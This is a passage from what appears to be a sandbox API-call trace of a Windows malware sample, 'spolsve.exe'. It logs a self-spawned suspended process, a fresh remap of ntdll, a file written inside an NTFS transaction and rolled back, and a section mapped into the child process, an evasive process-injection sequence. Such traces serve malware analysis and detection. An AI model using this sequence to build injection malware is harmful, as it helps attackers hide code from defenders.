(lpszFormat="Link Source Descriptor") returned 0xc00f [0077.838] RegisterClipboardFormatA (lpszFormat="FileName") returned 0xc006 [0077.838] RegisterClipboardFormatA (lpszFormat="FileNameW") returned 0xc007 [0077.838] RegisterClipboardFormatA (lpszFormat="Rich Text Format") returned 0xc07f [0077.838] RegisterClipboardFormatA (lpszFormat="RichEdit Text and Objects") returned 0xc088 [0077.839] GetStartupInfoA (in: lpStartupInfo=0x19ff24 | out: lpStartupInfo=0x19ff24*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0077.839] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0077.839] SetErrorMode (uMode=0x0) returned 0x0 [0077.839] SetErrorMode (uMode=0x8001) returned 0x0 [0077.839] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x19fcac, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\templates\\spolsve.exe")) returned 0x47 [0077.839] lstrcpynA (in: lpString1=0x19fdb0, lpString2="spolsve", iMaxLength=260 | out: lpString1="spolsve") returned="spolsve" [0077.839] LoadStringA (in: hInstance=0x400000, uID=0xe000, lpBuffer=0x19fbac, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0077.839] lstrcpyA (in: lpString1=0x19fcef, lpString2=".HLP" | out: lpString1=".HLP") returned=".HLP" [0077.839] lstrcatA (in: lpString1="spolsve", lpString2=".INI" | out: lpString1="spolsve.INI") returned="spolsve.INI" [0077.839] GetCurrentThreadId () returned 0x784 [0077.839] SetWindowsHookExA (idHook=-1, lpfn=0x415ddb, hmod=0x0, dwThreadId=0x784) returned 0x1b00cb [0077.840] LocalAlloc (uFlags=0x40, uBytes=0x30) returned 0x513468 [0077.840] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5178b0 [0077.840] LocalReAlloc (hMem=0x50e988, uBytes=0x10, uFlags=0x2) returned 0x50e988 [0091.555] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x5178c0 [0091.555] VirtualProtect (in: lpAddress=0x422548, dwSize=0x8000, flNewProtect=0x40, lpflOldProtect=0x19feb4 | out: lpflOldProtect=0x19feb4*=0x2) returned 1 [0091.864] LoadIconA (hInstance=0x400000, lpIconName=0x80) returned 0x0 [0091.978] EnumChildWindows (hWndParent=0x0, lpEnumFunc=0x427068, lParam=0x0) [0115.666] RtlInitUnicodeString (in: DestinationString=0x19fbdc, SourceString="ole32.dll" | out: DestinationString="ole32.dll") [0115.666] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x19fc14 | out: BaseAddress=0x19fc14*=0x759c0000) returned 0x0 [0115.667] RtlInitUnicodeString (in: DestinationString=0x19fbdc, SourceString="shell32.dll" | out: DestinationString="shell32.dll") [0115.667] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32.dll", BaseAddress=0x19fc10 | out: BaseAddress=0x19fc10*=0x76540000) returned 0x0 [0115.667] GetProcAddress (hModule=0x759c0000, lpProcName="CoCreateInstance") returned 0x75c97490 [0115.668] GetProcAddress (hModule=0x759c0000, lpProcName="CoInitializeEx") returned 0x75cd2590 [0115.668] GetProcAddress (hModule=0x76540000, lpProcName="SHGetSpecialFolderPathW") returned 0x766a12f0 [0115.668] GetProcAddress (hModule=0x76540000, lpProcName="SHCreateItemFromParsingName") returned 0x76647f00 [0115.668] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1048) returned 0x541dd8 [0115.669] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1000) returned 0x542e28 [0115.669] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10c00) returned 0x543e30 [0115.670] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x10c8f) returned 0x554a38 [0115.674] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x541dd8) returned 1 [0115.674] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x542e28) returned 1 [0115.675] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\WINDOWS\\SYSTEM32\\ntdll.dll", NtPathName=0x19f6c8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\WINDOWS\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.675] NtCreateFile (in: FileHandle=0x19f6dc, DesiredAccess=0x80100000, ObjectAttributes=0x19f6a8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\WINDOWS\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f6c0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f6dc*=0x228, IoStatusBlock=0x19f6c0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0115.676] NtCreateSection (in: SectionHandle=0x19f6d8, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x228 | out: SectionHandle=0x19f6d8*=0x22c) returned 0x0 [0115.676] NtMapViewOfSection (in: SectionHandle=0x22c, ProcessHandle=0xffffffff, BaseAddress=0x19f6d4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19f6d0*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19f6d4*=0x2320000, SectionOffset=0x0, ViewSize=0x19f6d0*=0x18e000) returned 0x40000003 [0115.676] NtClose (Handle=0x228) returned 0x0 [0115.677] NtClose (Handle=0x22c) returned 0x0 [0115.678] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19f9bc*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19fc4c, hNewToken=0x0 | out: lpProcessInformation=0x19fc4c*(hProcess=0x228, hThread=0x22c, dwProcessId=0x4a8, dwThreadId=0xa80), hNewToken=0x0) returned 1 [0115.698] NtQueryInformationProcess (in: ProcessHandle=0x228, ProcessInformationClass=0x0, ProcessInformation=0x19fa9c, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19fa9c, ReturnLength=0x0) returned 0x0 [0115.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe", NtPathName=0x19f6c4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.698] NtCreateFile (in: FileHandle=0x19f6d8, DesiredAccess=0x80100000, ObjectAttributes=0x19f6a4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\spolsve.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f6bc, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19f6d8*=0x234, IoStatusBlock=0x19f6bc*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0115.698] NtCreateSection (in: SectionHandle=0x19f6d4, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x234 | out: SectionHandle=0x19f6d4*=0x230) returned 0x0 [0115.698] NtMapViewOfSection (in: SectionHandle=0x230, ProcessHandle=0xffffffff, BaseAddress=0x19f6d0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19f6cc*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19f6d0*=0x4b0000, SectionOffset=0x0, ViewSize=0x19f6cc*=0x4b000) returned 0x40000003 [0115.698] NtClose (Handle=0x234) returned 0x0 [0115.698] NtClose (Handle=0x230) returned 0x0 [0115.698] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x1000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x1000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xf000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0115.698] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x10000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x10000, AllocationBase=0x10000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.698] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x30000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.698] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x32000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x32000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0115.699] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x40000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x40000, AllocationBase=0x40000, AllocationProtect=0x2, RegionSize=0x18000, State=0x1000, Protect=0x2, Type=0x40000), ResultLength=0x0) returned 0x0 [0115.699] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x58000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x58000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x8000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0115.699] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x60000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x60000, AllocationBase=0x60000, AllocationProtect=0x4, RegionSize=0x35000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.699] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x95000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x95000, AllocationBase=0x60000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.699] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x98000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x98000, AllocationBase=0x60000, AllocationProtect=0x4, RegionSize=0x8000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.699] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0xa0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.762] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x19d000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x19d000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.762] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x19f000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.762] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x1a0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000), ResultLength=0x0) returned 0x0 [0115.762] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x1a4000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x1a4000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0115.762] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x1b0000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.762] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x1b1000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x1b1000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x4f000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0115.762] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x200000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x200000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x7c000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.763] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x27c000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x27c000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.763] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x281000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x281000, AllocationBase=0x200000, AllocationProtect=0x4, RegionSize=0x17f000, State=0x2000, Protect=0x0, Type=0x20000), ResultLength=0x0) returned 0x0 [0115.763] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x400000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0115.763] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x401000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x21000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0115.763] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x422000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x422000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x11000, State=0x1000, Protect=0x2, Type=0x1000000), ResultLength=0x0) returned 0x0 [0115.763] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x433000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x433000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x18000, State=0x1000, Protect=0x8, Type=0x1000000), ResultLength=0x0) returned 0x0 [0115.763] NtQueryVirtualMemory (in: ProcessHandle=0x228, Address=0x44b000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x19f6ac, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0x19f6ac*(BaseAddress=0x44b000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x77945000, State=0x10000, Protect=0x1, Type=0x0), ResultLength=0x0) returned 0x0 [0115.763] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f6c4 | out: Wow64Process=0x19f6c4) returned 1 [0115.764] Wow64DisableWow64FsRedirection (in: OldValue=0x19ee0c | out: OldValue=0x19ee0c*=0x0) returned 1 [0115.764] GetSystemDirectoryW (in: lpBuffer=0x19ebd8, uSize=0x20a | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0115.764] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\WINDOWS\\system32\\ntdll.dll", NtPathName=0x19edec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\WINDOWS\\system32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.764] NtCreateFile (in: FileHandle=0x19ee34, DesiredAccess=0x80100000, ObjectAttributes=0x19edf4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\WINDOWS\\system32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ede4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19ee34*=0x230, IoStatusBlock=0x19ede4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0115.765] NtCreateSection (in: SectionHandle=0x19ee30, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x230 | out: SectionHandle=0x19ee30*=0x234) returned 0x0 [0115.765] NtMapViewOfSection (in: SectionHandle=0x234, ProcessHandle=0xffffffff, BaseAddress=0x19ee2c*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19ee10*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19ee2c*=0x24b0000, SectionOffset=0x0, ViewSize=0x19ee10*=0x1db000) returned 0x40000003 [0115.765] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0115.765] NtClose (Handle=0x230) returned 0x0 [0115.765] NtClose (Handle=0x234) returned 0x0 [0115.766] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x2d6000, Buffer=0x19ee48, NumberOfBytesToRead=0x2d0, NumberOfBytesRead=0x0 | out: Buffer=0x19ee48*, NumberOfBytesRead=0x0) returned 0x0 [0115.766] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x2d4000, Buffer=0x19f118, NumberOfBytesToRead=0x320, NumberOfBytesRead=0x0 | out: Buffer=0x19f118*, NumberOfBytesRead=0x0) returned 0x0 [0115.766] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x7ffd0af1b340, Buffer=0x19f5c8, NumberOfBytesToRead=0x58, NumberOfBytesRead=0x0 | out: Buffer=0x19f5c8*, NumberOfBytesRead=0x0) returned 0x0 [0115.766] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x612620, Buffer=0x19f620, NumberOfBytesToRead=0x88, NumberOfBytesRead=0x0 | out: Buffer=0x19f620*, NumberOfBytesRead=0x0) returned 0x0 [0115.766] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x612220, Buffer=0x19f438, NumberOfBytesToRead=0x18, NumberOfBytesRead=0x0 | out: Buffer=0x19f438*, NumberOfBytesRead=0x0) returned 0x0 [0115.767] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x612490, Buffer=0x19f620, NumberOfBytesToRead=0x88, NumberOfBytesRead=0x0 | out: Buffer=0x19f620*, NumberOfBytesRead=0x0) returned 0x0 [0115.767] NtReadVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x7ffd0aee38e0, Buffer=0x19f438, NumberOfBytesToRead=0x14, NumberOfBytesRead=0x0 | out: Buffer=0x19f438*, NumberOfBytesRead=0x0) returned 0x0 [0115.767] NtUnmapViewOfSection (ProcessHandle=0x228, BaseAddress=0x400000) returned 0x0 [0115.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19f6dc*=0x0, ZeroBits=0x0, RegionSize=0x19f6d4*=0x7fff, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x19f6dc*=0x460000, RegionSize=0x19f6d4*=0x8000) returned 0x0 [0115.767] RtlInitUnicodeString (in: DestinationString=0x19f6c4, SourceString="TEMP" | out: DestinationString="TEMP") [0115.767] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="TEMP", Value=0x19f6cc | out: Value="C:\\Users\\FD1HVy\\AppData\\Local\\Temp") returned 0x0 [0115.767] NtCreateTransaction (in: TransactionHandle=0x19fbb8, DesiredAccess=0x1f003f, ObjectAttributes=0x0, Uow=0x0, TmHandle=0x0, CreateOptions=0x0, IsolationLevel=0x0, IsolationFlags=0x0, Timeout=0x0, Description=0x0 | out: TransactionHandle=0x19fbb8*=0x234) returned 0x0 [0115.769] RtlSetCurrentTransaction (TransactionHandle=0x234) returned 1 [0115.769] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Liebert.bmp", NtPathName=0x19f6c4, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Liebert.bmp", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0115.769] NtCreateFile (in: FileHandle=0x19fbbc, DesiredAccess=0xc0100000, ObjectAttributes=0x19f6a4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\Liebert.bmp", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19f6bc, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x2, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x19fbbc*=0x230, IoStatusBlock=0x19f6bc*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0115.777] RtlSetCurrentTransaction (TransactionHandle=0x0) returned 1 [0115.777] NtWriteFile (in: FileHandle=0x230, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0x19f6a8, Buffer=0x554a38*, Length=0x10c00, ByteOffset=0x19f6b0*=0, Key=0x0 | out: IoStatusBlock=0x19f6a8, Buffer=0x554a38*) returned 0x0 [0115.779] NtCreateSection (in: SectionHandle=0x19fbe8, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0x230 | out: SectionHandle=0x19fbe8*=0x240) returned 0x0 [0115.786] NtRollbackTransaction (TransactionHandle=0x234, Wait=1) returned 0x0 [0115.888] NtQuerySection (in: SectionHandle=0x240, SectionInformationClass=0x1, SectionInformation=0x19f678, Length=0x30, ResultLength=0x0 | out: SectionInformation=0x19f678, ResultLength=0x0) returned 0x0 [0115.888] NtClose (Handle=0x230) returned 0x0 [0115.889] NtClose (Handle=0x234) returned 0x0 [0115.889] NtMapViewOfSection (in: SectionHandle=0x240, ProcessHandle=0x228, BaseAddress=0x19fc74*=0x400000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19fc24*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x19fc74*=0x400000, SectionOffset=0x0, ViewSize=0x19fc24*=0x28000) returned 0x0 [0115.890] NtGetContextThread (in: ThreadHandle=0x22c, Context=0x19f6f0 | out: Context=0x19f6f0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x27d000, Edx=0x0, Ecx=0x0, Eax=0x409cb0, Ebp=0x0, Eip=0x77e04210, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, 